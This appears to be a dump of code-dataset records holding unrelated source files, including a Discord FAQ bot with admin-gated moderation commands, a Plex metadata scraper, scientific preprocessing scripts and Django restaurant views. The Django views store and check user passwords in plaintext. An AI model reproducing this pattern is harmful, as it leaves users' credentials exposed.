view_track(path)\n","sub_path":"lk_track.py","file_name":"lk_track.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336164249","text":"'''\r\n-------------------------------------------------------------------------------\r\nREADME:\r\nVery short script used to visualize data collected from transfermarkt.de.\r\nFirst version only contains a bar chart. I will use this script to recreate\r\nmost if not all visualizations I made in Tableau Public.\r\n-------------------------------------------------------------------------------\r\n'''\r\nimport matplotlib\r\nfrom matplotlib import pyplot as plt\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\nfrom datetime import datetime\r\n\r\nstart_time = datetime.now()\r\n# Function to add label containing the value of a bar chart at it's end.\r\n# From official matplotlib documentation\r\ndef autolabel(rects, xpos=\"center\"):\r\n ha = {\"center\" : \"center\", \"right\" : \"left\", \"left\" : \"right\"}\r\n offset = {\"center\" : 0, \"right\" : 1, \"left\" : -1}\r\n\r\n for rect in rects:\r\n height = round(rect.get_height(), 2)\r\n ax.annotate(\"{}\".format(height),\r\n xy = (rect.get_x() + rect.get_width() / 2, height),\r\n xytext = (offset[xpos]*3, 3),\r\n textcoords = \"offset points\",\r\n ha = ha[xpos], va = \"bottom\")\r\n\r\nfp = os.getcwd() + \"\\\\Data\\\\Tier_1_Leagues.xlsx\"\r\n\r\n# Get all sheet names from Excel file. Store sheet names in list \"leagues\".\r\n# Append all sheets from file to pandas dataframe. 
Add nation in column \"league\"\r\nVAR = pd.read_excel(fp, sheet_name=None)\r\nleagues = [sheet for sheet in VAR.keys()]\r\ndf = pd.read_excel(fp)\r\ndf[\"League\"] = \"Germany\"\r\nfor league in leagues[1:]:\r\n VAR = pd.read_excel(fp, sheet_name=league)\r\n VAR[\"League\"] = league\r\n df = df.append(VAR, ignore_index=True)\r\n\r\n# Create bar chart using matplotlib\r\nfig, ax = plt.subplots()\r\n\r\nplt.xticks(rotation=45)\r\nfor league in leagues:\r\n t = ax.bar(df[\"League\"][df.League == league].sort_values(), df[\"Current_MV_EUR\"][df.League == league].mean() / 10**6)\r\n autolabel(t, \"center\")\r\n\r\nplt.title(\"Average Market Value Of Top 100 Players Per League\")\r\nplt.ylabel(\"AVG MV [mil. $]\")\r\n\r\nprint(\"Success!\")\r\nplt.show()\r\n\r\nprint(\"Done --- Time taken: \" + (str(datetime.now() - start_time)))\r\n","sub_path":"tm_vis.py","file_name":"tm_vis.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236528160","text":"import PAsearchSites\nimport PAutils\n\n\ndef search(results, lang, siteNum, searchData):\n params = json.dumps({\n 'sortBy': 'MOST_RELEVANT',\n 'searchQuery': searchData.title,\n 'videoView': 'MEDIUM'\n })\n req = PAutils.HTTPRequest(PAsearchSites.getSearchSearchURL(siteNum), params=params, headers={'Content-Type': 'application/json'})\n searchResults = req.json()\n for searchResult in searchResults['contents']:\n releaseDate = parse(searchResult['released']).strftime('%Y-%m-%d')\n curID = PAutils.Encode(searchResult['videoUri'])\n posterID = PAutils.Encode(searchResult['mainImageSrcset'].split(',')[1][:-3].replace('https', 'http'))\n siteName = PAsearchSites.getSearchSiteName(siteNum)\n titleNoFormatting = '%s [%s] %s' % (searchResult['title'], siteName, releaseDate)\n\n if searchData.date:\n score = 100 - Util.LevenshteinDistance(searchData.date, releaseDate)\n else:\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n results.Append(MetadataSearchResult(id='%s|%d|%s' % (curID, siteNum, posterID), name=titleNoFormatting, score=score, lang=lang))\n\n return results\n\n\ndef update(metadata, lang, siteNum, movieGenres, movieActors, art):\n metadata_id = str(metadata.id).split('|')\n sceneURL = PAutils.Decode(metadata_id[0])\n if not sceneURL.startswith('http'):\n sceneURL = PAsearchSites.getSearchBaseURL(siteNum) + \"/\" + sceneURL\n posterUri = PAutils.Decode(metadata_id[2])\n req = PAutils.HTTPRequest(sceneURL)\n detailsPageElements = HTML.ElementFromString(req.text)\n\n movieGenres.clearGenres()\n movieActors.clearActors()\n\n # Title\n metadata.title = detailsPageElements.xpath('//h1[@class=\"video-detail-name\"]')[0].text_content().strip()\n\n # Summary\n rawSummary = detailsPageElements.xpath('//p[@itemprop=\"description\"]')[0].text_content().replace('…', '').replace('Read more', '')\n metadata.summary = ' '.join(rawSummary.split())\n\n # Studio\n metadata.studio = PAsearchSites.getSearchSiteName(siteNum)\n\n # Tagline and Collection(s)\n metadata.collections.clear()\n metadata.tagline = metadata.studio\n metadata.collections.add(metadata.studio)\n\n # Release Date\n date = detailsPageElements.xpath('//span[@class=\"videoClip__Details-infoValue\"]')[0].text_content().strip()\n if date:\n date_object = parse(date)\n metadata.originally_available_at = date_object\n metadata.year = metadata.originally_available_at.year\n\n # Genres\n for genreLink in 
detailsPageElements.xpath('//span[@itemprop=\"keywords\"]/a'):\n genreName = genreLink.text_content().strip().lower()\n movieGenres.addGenre(genreName)\n\n # Actors\n actors = detailsPageElements.xpath('//span[@itemprop=\"actors\"]/a')\n for actorLink in detailsPageElements.xpath('//span[@itemprop=\"actors\"]/a'):\n actorName = actorLink.text_content().strip()\n actorPhotoURL = ''\n\n try:\n actorPageURL = actorLink.get('href')\n req = PAutils.HTTPRequest(actorPageURL)\n actorPage = HTML.ElementFromString(req.text)\n actorPhotoLinks = actorPage.xpath('//img[@class=\"girlDetails-posterImage\"]/@srcset')[0]\n actorPhotoURL = actorPhotoLinks.split(',')[1][:-3].replace('https', 'http')\n except:\n pass\n\n movieActors.addActor(actorName, actorPhotoURL)\n\n # Photos\n for photo in detailsPageElements.xpath('//img[contains(@class, \"videoClip__Details--galleryItem\")]/@data-big'):\n photoURLs = photo.split(',')\n photoURL = photoURLs[len(photoURLs) - 1][:-6].replace('https', 'http')\n\n art.append(photoURL)\n\n Log('Artwork found: %d' % len(art))\n for idx, posterUrl in enumerate(art, 1):\n if not PAsearchSites.posterAlreadyExists(posterUrl, metadata):\n # Download image file for analysis\n try:\n image = PAutils.HTTPRequest(posterUrl)\n im = StringIO(image.content)\n resized_image = Image.open(im)\n width, height = resized_image.size\n # Add the image proxy items to the collection\n if width > 1:\n # Item is a poster\n metadata.posters[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n if width > 100:\n # Item is an art item\n metadata.art[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n except:\n pass\n\n return metadata\n","sub_path":"Contents/Code/siteRealityLovers.py","file_name":"siteRealityLovers.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"15191382","text":"# scale/forms.py\nfrom django import forms\nfrom models import Scale\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ScaleForm(forms.ModelForm):\n\n class Meta:\n model = Scale\n fields = ('name_scale', 'is_active')\n labels = {\n 'name_scale': _('Scale Name'),\n 'is_active': _('Is Active?'),\n }\n","sub_path":"scale/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"458590894","text":"\n\"\"\"\n-------------------------------------------------------------------------------------------------\nAuthor: Patil Aakash (aakash.patil@mines-paristech.fr) \nFrom Library: PyTransport \nYear: March, 2020 \n-------------------------------------------------------------------------------------------------\n\"\"\"\n\n\n\n#case and results location\ncase_dir = '../case_sample'\nresultats_dir = case_dir+'/resultats/2d/' \n\n\n#re-sampling grid nx and ny\nTnx, Tny = 360, 300\n\n\n############## Import libs: SYS, LOCAL, USER ##############\nimport os\nimport glob\nimport numpy as np\nfrom tqdm import tqdm\nfrom Lib_PyTransport import *\n##############################################################\n\n#get list of all result files\nfileListVTU = sorted(glob.glob(resultats_dir+'bulles*.vtu'))\nprint(\"Found \",len(fileListVTU) ,\".vtu files. 
\\n First file: \",fileListVTU[0] ,\"\\n Last file: \", fileListVTU[-1] )\n\n\n#get node info from original VTU / init VTU \ninputVTU = fileListVTU[0]\nbounds = getVTUBounds(inputVTU) \n\n\ntry:\n structDict, coordinates_structList = TransportVTU2Struct_2d(inputVTU,arrayName='ALL', nx=Tnx, ny=Tny, outputFile=None, returnDict=True)\n struct_Velocity = structDict['VitesseP1']\n print(\"struct_Velocity.shape \",struct_Velocity.shape)\nexcept:\n raise NameError(\"** ERROR Some issue with \", inputVTU) \n\n\n#convert all vtu unstruct results to struct arrays \nbigArr = np.zeros((len(fileListVTU), Tnx, Tny, 5))\nfor t in tqdm(range(len(fileListVTU))):\n vtuFile = fileListVTU[t]\n print(\"Reading and Converting: \", vtuFile)\n structDict, coordinates_structList = TransportVTU2Struct_2d( vtuFile, arrayName='ALL', nx=Tnx, ny=Tny, outputFile=None, returnDict=True)\n bigArr[t, :, :, :2] = structDict['VitesseP1'][:,:,:2]\n bigArr[t, :, :, 2] = structDict['PressionP1']\n bigArr[t, :, :, 3] = structDict['NuTildeP1']\n bigArr[t, :, :, 4] = structDict['MuTurbP1']\n \n \n#save in format [N, nx, ny, ch] \nnp.save(\"dataset.npy\", bigArr)\n\nprint(\"Done converting. Output saved to dataset.npy\")\n\n\n\n\n\n\n \n\n\n\n","sub_path":"transport/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"156513107","text":"import discord\nimport aiohttp\nimport filehandler as io\nimport discordutils as dcf\nimport parseutils as pu\nimport scraper as sc\nimport datetime\nimport subprocess\nimport sys\nimport languageki as ki\nimport readme as rtfmgen\n\nimport time\nimport random\nimport bs4 as bs\nfrom discord.ext import commands\n\nprefixes = [\"d!\", \"f!\", \"fe!\"]\nbot = commands.Bot(command_prefix=prefixes)\nbot.remove_command(\"help\")\n\n#define the filepath\nfilepath = './files/'\n\n#open the commands xml\nroot = io.readXML(filepath,'data.xml')\nprint(\"XML file read \\n\")\n\n#ids for dreamhack int color code and faq channel, as well as permission denied message\ndhorange = 16738079\nfaqchannel = \"<#376765597226106890>\"\nauthfailed = \"I\\'m sorry Dave, I\\'m afraid I can\\'t do that.\"\nunknown_de = \"Den Befehl kenne ich leider nicht. Schau doch mal in meiner Befehlsübersicht nach:\"\nunknown_en = \"I don't recognize that command. Try checking my commandlist:\"\nmirnemoji = \"DHCactus\"\nmirnchance = 42\nmsgchan = None\nfaqcid = 484264883169525760\nintid = 183158280216903680\nrandomuid = 214832573392748544 \n\n#initialize users and emoji\nmirn = None\nmegauser = None\nadmin = None\nmanager = None\nfaqdm = None\nfaqmsgchan = None\nmessagechannel = None\ndhserv = None\ninternal = None\nmembed = None\n\n#antispam variable\nlast = datetime.datetime.now()\nlastauto = datetime.datetime.now()\nspamdelay = 20\nautodelay = 30\n\nqreply = [\n \"\",\n \"Sitzplatzreservierung? Mitte Dezember!\",\n \"Da schauste am besten mal mit f!aq Pavilion nach.\",\n \"Für die Turniere ist grad noch nix genaues bekannt, aber vielleicht kommt ja bald was!\",\n \"Nee ... Lass die mal zu Hause ...\",\n \"Wir reden hier nicht von dir...\",\n \"Nein, Kühlschränke sind nicht erlaubt. 
Draußen ist doch im Februar kalt genug ...\"\n]\n\n#read faq commands\ncomm_de = io.fetch(root, 'cde')\ncomm_en = io.fetch(root, 'ceng')\n\nprint(\"Command lists read.\\n\")\n\nprint(\"German Commands:\"+str(comm_de))\nprint(\"English Commands:\"+str(comm_en))\n\n#generate uppercase commands from lists\ncomm_de_upper = [s.upper() for s in comm_de]\ncomm_en_upper = [s.upper() for s in comm_en]\n\n\n#read in questions and parse the text (formating and replacing)\nq_de = io.fetchTXT(root, 'qde')\nq_en = io.fetchTXT(root, 'qeng')\nprint(\"Questions read and processed.\\n\")\n\n\n#read in answers and parse the text (formating and replacing)\na_de = io.fetchTXT(root, 'ade')\na_en = io.fetchTXT(root, 'aeng')\nprint(\"Answers read and processed.\\n\")\n\n\n#read a user list for voting\nul = io.getUserList(filepath)\nprint(\"Userlist read.\\n\")\n\nprint('------\\n')\n\n#generating strings for help commands\nhelp_de = pu.gString(comm_de)\nhelp_en = pu.gString(comm_en)\n\n#open the token file and mirn counter\nTOKEN = io.getToken(filepath)\nADMIN = io.getAdmin(filepath)\nfaquid = io.getFeed(filepath)\nmc = io.getVal(filepath, 'mirn.dcbt')\n\nprint(\"Loading Mirns: \" + str(mc) +\"\\n\")\n\nprint(\"Logging in...\\n\")\n\n#returns the server object\ndef fetchServer(id):\n server = bot.get_guild(id)\n return server\n\n#define the status message of the bot\nasync def GameChanger():\n await bot.change_presence(game=discord.Game(name=\"f!help | fe!help\"))\n return\n\n#sends an embed message\nasync def sendEmbed(channelObject, embedObject):\n await channelObject.send(\" \", embed=embedObject)\n return\n\n#downtime Check\nasync def DownTime():\n async for message in internal.history(limit=50): #find last message by bot (restarting, etc)\n if message.author == bot.user: \n timeObject1 = message.created_at #create time object of last message\n break\n await internal.send(\"Bot Online\")\n async for message in internal.history(limit=1): #create time object of newest bot message (Online)\n timeObject2 = message.created_at\n downtime = pu.dateProcess(timeObject2, timeObject1) #calculate time difference in minutes\n await internal.send(\"Downtime: \" + downtime) #send time difference\n return\n\n@bot.command(name=\"restart\")\nasync def restart(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n await ctx.message.channel.send(\"Restarting...\")\n subprocess.Popen([sys.executable, \"./restart.py\"])\n await bot.close()\n return\n for i in range(len(ctx.author.roles)):\n if ctx.author.roles[i] == admin:\n await ctx.message.channel.send(\"Restarting...\")\n subprocess.Popen([sys.executable, \"./restart.py\"])\n await bot.close()\n return\n\n@bot.command(name=\"rtfm\")\nasync def rtfm(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n async for message in ctx.channel.history(limit=50):\n if message.author == bot.user:\n await message.delete()\n faq, titles = rtfmgen.generatePost()\n for i in range(len(faq)):\n await ctx.message.channel.send(titles[i], embed=None)\n await ctx.message.channel.send(\"\", embed=faq[i])\n return\n\n@bot.command(name=\"cln\")\nasync def cln(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n async for message in ctx.channel.history(limit=99999):\n if message.author == ctx.author:\n await message.delete()\n\n@bot.command(name=\"update\")\nasync def update(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n await ctx.message.channel.send(\"Updating...\")\n subprocess.Popen([sys.executable, \"./update.py\"])\n await bot.close()\n return\n for 
i in range(len(ctx.author.roles)):\n if ctx.author.roles[i] == admin:\n await ctx.message.channel.send(\"Updating...\")\n subprocess.Popen([sys.executable, \"./update.py\"])\n await bot.close()\n return\n\n@bot.command(name=\"ban\")\nasync def ban(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n banid = dcf.fetchUser(dhserv, ctx)\n await banid.ban(reason=None, delete_message_days=0)\n await ctx.message.channel.send(str(banid) + \" was banned from the server.\")\n return\n\n#define the different commands\n@bot.command(name=\"shutdown\")\nasync def shutdown(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n await ctx.send(\"Shutting down...\")\n await bot.close()\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.author) + \" tried to access command d!shutdown!\")\n return\n\n\n@bot.command(name=\"help\")\nasync def help(ctx):\n if ctx.prefix == \"f!\":\n await sendEmbed(ctx.message.channel, dcf.helpDE(help_de))\n return\n elif ctx.prefix == \"fe!\":\n await sendEmbed(ctx.message.channel, dcf.helpEN(help_en))\n return\n\n@bot.command(name=\"remaining\")\nasync def remaining(ctx):\n if ctx.prefix == \"f!\":\n remaining, sold, maxt = sc.crawlTickets()\n remst = str(sold) + \" / \" + str(maxt)\n verst = str(remaining)\n embed = discord.Embed(color=dhorange)\n embed.add_field(name=\"Verkaufte Tickets:\", value=remst, inline=False)\n embed.add_field(name=\"Verbleibende Tickets:\", value=verst, inline=False)\n await ctx.send(\" \", embed=embed)\n else:\n return\n\n@bot.command(name=\"aber\")\nasync def aber(ctx):\n if ctx.prefix == \"d!\":\n for i in range(len(ctx.author.roles)):\n if ctx.author.roles[i] == megauser or ctx.author.roles[i] == admin or ctx.author.roles[i] == manager:\n embed = discord.Embed(color=dhorange)\n string = ctx.message.content[7:]\n embed.add_field(name=\"Aber ...\", value = \"...was ist mit \" + str(string)+\"?\")\n embed.set_image(url=\"https://media.giphy.com/media/xT0xeA1Eq7jidwWBoc/giphy.gif\")\n await ctx.message.channel.send(\" \", embed=embed)\n return\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access command d!aber!\")\n return\n\n@bot.command(name=\"embed\")\nasync def embed(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n global msgchan\n embed = discord.Embed(color=dhorange)\n message = str(ctx.message.content)\n message = message[7:]\n embed.add_field(name=\"...\", value = message)\n await msgchan.send(\"\", embed=embed)\n return\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access command d!embed!\")\n return\n\n#FAQ Command\n@bot.command(name=\"aq\")\nasync def aq(ctx, arg1):\n if ctx.prefix == \"f!\": #check for german prefix\n gmsg = pu.faqParse(arg1) #parse the message (unleet, upper, fancy stuff)\n ph = pu.checkCommN(comm_de_upper, gmsg) #check for existing command\n if ph is not False: #generate and send a reply to the faq command\n await sendEmbed(ctx.message.channel, dcf.FAQ(q_de[ph], a_de[ph], dhorange)) \n return\n else: #generate and send a help embed if the command is not found\n await ctx.send(unknown_de, embed=dcf.helpDE(help_de))\n print(str(ctx.message.author)+ \" used an unknown command (\" +str(ctx.message.content)+\")\")\n return\n\n if ctx.prefix == \"fe!\": #check for english prefix\n emsg = pu.faqParse(arg1) #parse the message (unleet, upper, etc)\n ph = pu.checkCommN(comm_en_upper, emsg) #check for existing command\n if ph is not False: #generate and send a reply to the 
faq command\n await sendEmbed(ctx.message.channel, dcf.FAQENG(q_en[ph], a_en[ph], dhorange))\n return\n else: #generate and send a help embed if the command is not found\n await ctx.send(unknown_en, embed=dcf.helpEN(help_en))\n print(str(ctx.message.author)+ \" used an unknown command (\" +str(ctx.message.content)+\")\")\n return\n\n#check how many mirns were posted in the welcome\n@bot.command(name=\"mirn\")\nasync def mirnn(ctx):\n if ctx.prefix == \"d!\":\n embed = discord.Embed(color=dhorange)\n dcf.addEmbed(embed, \"Mirns im Welcome: \", mc)\n await ctx.message.channel.send(\" \", embed=embed) \n\n#set a channel for the bot to communicate in \n@bot.command(name=\"setchannel\")\nasync def setchannel(ctx, arg):\n if ctx.prefix == \"d!\":\n if ctx.message.author.id == ADMIN:\n global msgchan\n msgchan = bot.get_channel(int(arg))\n print(\"Channel set to: \" + str(msgchan))\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access admin restricted command d!setchannel!\")\n\n\n@bot.command(name=\"msg\")\nasync def sendmsg(ctx):\n if ctx.prefix == \"d!\":\n if ctx.message.author.id == ADMIN:\n botstring = str(ctx.message.content)\n botstring = botstring[5:]\n await msgchan.send(botstring)\n return\n else: \n await ctx.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access admin restricted command d!msg!\")\n\n\n@bot.command(name=\"mupdate\")\nasync def mirnupdate(ctx):\n if ctx.prefix == \"d!\":\n if ctx.message.author.id == ADMIN:\n mc = 0\n chann = bot.get_channel(137246928227270656)\n async for message in chann.history(limit=99999999999999999999):\n msg = message.content\n str(msg[:6])\n msg = msg.upper()\n if msg[:4] == \"MIRN\" or msg[:6] == \"MIRGEN\":\n mc +=1\n print(str(mc), end=\"\\r\")\n print(\"Total Number of Mirns: \"+str(mc))\n io.writeVal(filepath, 'mirn.dcbt', mc)\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access admin restricted command d!mupdate!\")\n\n@bot.command(name=\"eedback\")\nasync def feedback(ctx):\n if ctx.prefix == \"f!\":\n author = \"<@\"+str(ctx.message.author.id)+\">\"\n creation = pu.createDate(ctx.message.created_at)\n header = \"Neues Feedback vom \" + creation\n message = pu.feedString(str(ctx.message.content))\n feedback = \"Feedback von User: {} \\n\\n\".format(author)\n feedback = feedback + message\n print(\"Der User \"+str(ctx.message.author)+\"hat Feedback hinterlassen!\")\n embed = discord.Embed(color=dhorange)\n dcf.addEmbed(embed, header, feedback)\n await faqdm.send(\" \", embed = embed)\n await faqmsgchan.send(\" \", embed = embed)\n\n@bot.command(name=\"onnerstag\")\nasync def donnerstag(ctx):\n if ctx.prefix == \"d!\":\n global ul\n for user in ul:\n if ctx.message.author.id == user:\n await ctx.message.channel.send(\"Du hast bereits abgestimmt!\") \n return\n\n ul.append(ctx.message.author.id)\n io.writeUserList(filepath, ul)\n await ctx.message.channel.send(\"Stimme registriert!\") \n return\n\n@bot.command(name=\"checkvote\")\nasync def checkvote(ctx):\n if ctx.prefix == \"d!\":\n embed = discord.Embed(color=dhorange)\n dcf.addEmbed(embed, \"Anzahl der User, die sich den Donnerstag wünschen: \", str(len(ul)))\n await ctx.message.channel.send(\" \", embed = embed)\n\n# message sending and stuff\n@bot.event\nasync def on_message(message):\n global last, spamdelay, qreply, autodelay, lastauto\n if message.author == bot.user:\n return\n \n await bot.process_commands(message)\n\n #mirn v2\n msg = message.content\n 
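# any message starting with 'mirn' or 'mirgen' (case-insensitive) is tallied below and may get the DHCactus reaction, depending on a random roll\n 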
str(msg[:6])\n msg = msg.upper()\n if msg[:4] == \"MIRN\" or msg[:6] == \"MIRGEN\":\n global mc\n mc+=1\n io.writeVal(filepath, 'mirn.dcbt', mc)\n rnd = random.randint(1,100)\n print(str(message.author) + \" rolled: \" + str(rnd))\n if message.author.id == randomuid:\n await message.add_reaction(mirn)\n elif rnd < mirnchance:\n await message.add_reaction(mirn)\n return\n \n # qperc, topic, topicid = ki.nProcess(str(message.content))\n # if qperc >= 2:\n # if topicid > 0:\n # if (datetime.datetime.now()-lastauto).seconds > autodelay:\n # await message.channel.send(qreply[topicid])\n # lastauto = datetime.datetime.now()\n # print(str(message.author) + \" asked a question about: \" + str(topic))\n # return\n \n #if msg[:4] == \"MOIN\":\n # if (datetime.datetime.now()-last).seconds > spamdelay:\n # print(str(message.author) + \" said moin! OH NO!\")\n # await message.channel.send(\"Meinten sie: __mirn__?\")\n # last = datetime.datetime.now()\n # return\n \n #if msg[:5] == \"M OIN\" or msg[:5] == \"MO IN\" or msg[:5] == \"MOI N\":\n # if (datetime.datetime.now()-last).seconds > spamdelay:\n # print(str(message.author) + \" said moin! OH NO!\")\n # await message.delete()\n # await message.channel.send(\"Meinten sie: __mirn__?\")\n # last = datetime.datetime.now()\n # return\n \n #if msg[:6] == \"MORGEN\":\n # if (datetime.datetime.now()-last).seconds > spamdelay:\n # print(str(message.author) + \" said morgen! OH NO!\")\n # await message.channel.send(\"Meinten sie: __mirgen__?\")\n # last = datetime.datetime.now()\n # return\n \n#this is executed on startup\n@bot.event\nasync def on_ready():\n global mirn, megauser, admin, manager, faqmsgchan, faqdm, internal\n\n print('------')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n await GameChanger()\n dhserv = fetchServer(137246928227270656)\n mirn = dcf.fetchEmoji(dhserv, mirnemoji)\n megauser = dcf.fetchRole(dhserv, \"LAN.megauser\")\n admin = dcf.fetchRole(dhserv, \"Certified Admin\")\n manager = dcf.fetchRole(dhserv, \"Certified Manager\")\n faqmsgchan = bot.get_channel(faqcid)\n internal = bot.get_channel(intid)\n faqdm = dcf.fetchUser(dhserv, faquid)\n await DownTime()\n\nbot.run(TOKEN, bot=True, reconnect=True)\n","sub_path":"faqbot.py","file_name":"faqbot.py","file_ext":"py","file_size_in_byte":16669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249312912","text":"#!/usr/bin/env python3\n# The following create a dict where is listed every match of bp on a seq\n# But it doesn't represent perfect matching\n \ndef fasta_parse(raw_data):\n \"\"\"Preprocess the entry fasta file. Return a list with header as even\n index number and sequences in a list as odd number index\"\"\"\n \n data = []\n for cell in raw_data:\n if len(cell):\n parts = cell.split()\n header = parts[0]\n seq = ''.join(parts[1:])\n data.append(header)\n data.append([seq])\n return data\n\ndef append_value(dict_obj, key, value):\n \"\"\"Add a value for a given key in a given dictionnary\"\"\"\n \n if key in dict_obj:\n if not isinstance(dict_obj[key], list):\n dict_obj[key] = [dict_obj[key]]\n dict_obj[key].append(value)\n else:\n dict_obj[key] = value\n \ndef check_edges(x, y, list_seq, dict_seq):\n \"\"\"Check if there is this no edge registered yet for x and y. 
\n Otherwise it return True\"\"\"\n \n result = False\n x_key = True\n if x not in list_seq:\n print('Uncorrect bp: '+x)\n return result\n if y not in list_seq:\n print('Uncorrect bp: '+y)\n return result\n \n if x not in dict_seq:\n #print(x + ' not a key yet')\n x_key = False\n \n if x_key == True and y in dict_seq[x]:\n result = True\n \n for key, value in dict_seq.items():\n if key == y and x in value:\n result = True\n \n return result\n \n \nif __name__ == '__main__':\n f = open('/Users/mathias.galati/Downloads/test.txt', 'r')\n raw_data = f.read().strip().split('>')\n data = fasta_parse(raw_data)\n seq = data[1][0]\n \n # Construction of index of every bp in the seq with its associated number\n bp = []\n i = 1\n for x in seq:\n bp.append(x+str(i))\n i+=1\n \n # Construction of dictionary of matching\n match = {}\n for x in bp:\n for y in range(len(bp)):\n if check_edges(x, bp[y], bp, match) == False :\n if x[0] == 'A' and bp[y][0] == 'U':\n append_value(match, x, bp[y])\n if x[0] == 'U' and bp[y][0] == 'A':\n append_value(match, x, bp[y])\n if x[0] == 'G' and bp[y][0] == 'C':\n append_value(match, x, bp[y])\n if x[0] == 'C' and bp[y][0] == 'G':\n append_value(match, x, bp[y])\n print(match)\n \n # Count every value in the match dictionnary\n count = 0\n for key, value in match.items(): \n if isinstance(value, list): \n count += len(value)\n else:\n count += 1\n print(count) \n","sub_path":"match_bonding.py","file_name":"match_bonding.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342054676","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import auth\nfrom .models import *\nfrom django.contrib.auth.models import *\nfrom django.contrib import messages\nfrom django.core.files.storage import FileSystemStorage\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom collections import Counter\nimport datetime\nfrom django.contrib.auth import logout\nfrom random import randint\nimport json\n\n# Create your views here.\ndef index(request):\n items = Item.objects.all()\n return render(request,'index.html', {'items': items})\n \n\ndef showUlogin(request):\n return render(request, 'registerUser.html')\n\n\ndef Uregister(request):\n if request.method == \"POST\":\n fname = request.POST.get('fname')\n lname = request.POST.get('lname')\n username = request.POST.get('username')\n password = request.POST.get('password')\n email = request.POST.get('email')\n phone_no = request.POST.get('phone')\n address1 = request.POST.get('add1')\n address2 = request.POST.get('add2')\n city = request.POST.get('city')\n state = request.POST.get('state')\n if RestroUser.objects.filter(email=email).exists():\n messages.info(request, \"Already Registered\")\n return render(request, 'registerUser.html')\n else:\n user = RestroUser(username=username, password=password, first_name=fname,\n last_name=lname,email=email,phone_no=phone_no, address1 = address1, \n address2=address2,city=city,state=state)\n user.save()\n return redirect('/user')\n # return render(request, 'example.html')\n else:\n return render(request, 'registerUser.html')\n\n\ndef Ulogin(request):\n if request.user.is_authenticated:\n restrolist = Restaurant.objects.filter()\n request.session[\"uid_save\"] = request.user.id\n now = datetime.datetime.now()\n print(now)\n myorders = Order.objects.filter(uId = request.user.id)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = 
Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n \n print(itemidlist)\n return render(request, 'userhome.html', {'restro': restrolist, 'orders': itemidlist})\n else: \n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n # print(username)\n # print(password)\n user = RestroUser.objects.get(username = username, password = password)\n # print(user)\n if user is not None:\n auth.login(request, user)\n restrolist = Restaurant.objects.filter()\n request.session[\"uid_save\"] = user.id\n now = datetime.datetime.now()\n print(now)\n myorders = Order.objects.filter(uId = user.id)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n \n print(itemidlist)\n return render(request, 'userhome.html', {'restro': restrolist, 'orders': itemidlist})\n else:\n messages.info(request, 'Invalid Credentials !')\n return render(request, 'registerUser.html')\n else:\n messages.info(request, 'Invalid Method !')\n return redirect('showUlogin')\n\n\ndef homepage(request):\n if \"rid_save\" in request.session:\n rid_save_item = request.session[\"rid_save\"]\n\n getItems = Item.objects.filter(rId = rid_save_item)\n myorders = Order.objects.filter(rId = rid_save_item)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n return render(request, 'example.html', {'items': getItems, 'orders': itemidlist})\n\n\ndef showRlogin(request):\n return render(request, 'registerRestro.html')\n\n\ndef Rregister(request):\n if request.method == \"POST\" and request.FILES['logo']:\n name = request.POST.get('name')\n password = request.POST.get('password')\n email = request.POST.get('email')\n phone_no = request.POST.get('phone')\n address1 = request.POST.get('add1')\n address2 = request.POST.get('add2')\n city = request.POST.get('city')\n state = request.POST.get('state')\n logo = request.FILES['logo']\n fs = FileSystemStorage()\n filename = fs.save(logo.name, logo)\n url = fs.url(filename)\n if Restaurant.objects.filter(email=email).exists():\n messages.info(request, \"Already Registered\")\n return render(request, 'registerRestro.html')\n else:\n user = Restaurant(RestroName=name, 